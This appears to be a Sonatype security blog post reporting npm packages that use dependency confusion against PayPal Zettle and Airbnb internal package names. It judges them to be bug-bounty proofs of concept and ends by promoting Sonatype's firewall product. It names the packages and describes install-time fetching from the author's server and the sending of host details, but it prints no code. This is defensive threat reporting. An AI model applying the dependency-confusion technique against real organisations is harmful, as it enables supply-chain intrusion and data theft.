Sonatype has identified several npm packages that are named after internal dependencies purportedly used by PayPal Zettle and Airbnb developers.
These packages identified by our automated malware detection systems exploit the well-known dependency confusion technique in an attempt to gain access to these organizations’ internal systems. However, our analysis concludes these are proof-of-concept (PoC) packages published by pen testers hoping to collect a bug bounty.
Counterfeit npm packages target Zettle by PayPal
Tracked as sonatype-2023-3911, the packages published under the Zettle npm scope include the following. Each package has just one version, “35.0.0” published to npm.
@zettle-bo/account-settings
@zettle-bo/account-statement
@zettle-bo/apps
@zettle-bo/bank-settings
@zettle-bo/bootstrapper
@zettle-bo/capital
@zettle-bo/cash-register
@zettle-bo/customers
@zettle-bo/dashboard
@zettle-bo/direct-debit
@zettle-bo/integrations
@zettle-bo/inventory
@zettle-bo/invoices
@zettle-bo/pp-profile-widget
@zettle-bo/products
@zettle-bo/react
@zettle-bo/react-router-dom
@zettle-bo/react-spa
@zettle-bo/receipts
@zettle-bo/routes
@zettle-bo/sales-trends
@zettle-bo/settings
@zettle-bo/shell
@zettle-bo/staff-account
@zettle-bo/vertical-navigation
Upon installation, these packages attempt to download and install other npm packages e.g. “lolzettle-bololbank-settings” from the author’s web server. At the time of writing, the URL returns a blank object ({}) as opposed to functional code.
Sonatype confirmed with the author of these packages, who is a known security researcher in the industry, that these are a part of an ethical research experiment, and that no malicious payload or activity is involved. The researcher, however, did not answer if they earned a bug bounty yet.
Airbnb
Tracked as sonatype-2023-3913, we also analyzed the following packages that appear to target Airbnb developers:
airbn-geetest3
airbnb-env
airbnb-erf
airbnb-i18n-polyglot
airbnb-l10n
airbnb-mediator
airbnb-moment-more-format
These packages collect the system’s username, home directory path, hostname, IP address, and basic information and transmit these to the author’s servers.
Once again, given the metadata included in these packages and no outright malicious code, it appears to be PoC research.
Although these packages may be nothing more than bug bounty exercises, real world threat actors have frequently targeted and continue to target open source ecosystems like npm and PyPI with novel malware – such as cryptojackers, infostealers, and hijacked libraries, to compromise developers and ultimately poison the software supply chain.
While these packages appear to be bug-bounty exercises, Sonatype’s products such as Repository Firewall and Lifecycle stay on top of actual attacks and vulnerabilities and provide you with detailed insights to thwart Potentially Unwanted Applications (PUAs), malware, and vulnerable components from reaching your builds:
Users of Sonatype Repository Firewall can rest easy knowing that whether or not these types of packages are just a PoC or actually malicious, they would automatically be blocked from reaching their development builds. Either way, you don’t want them in your software development life cycle.
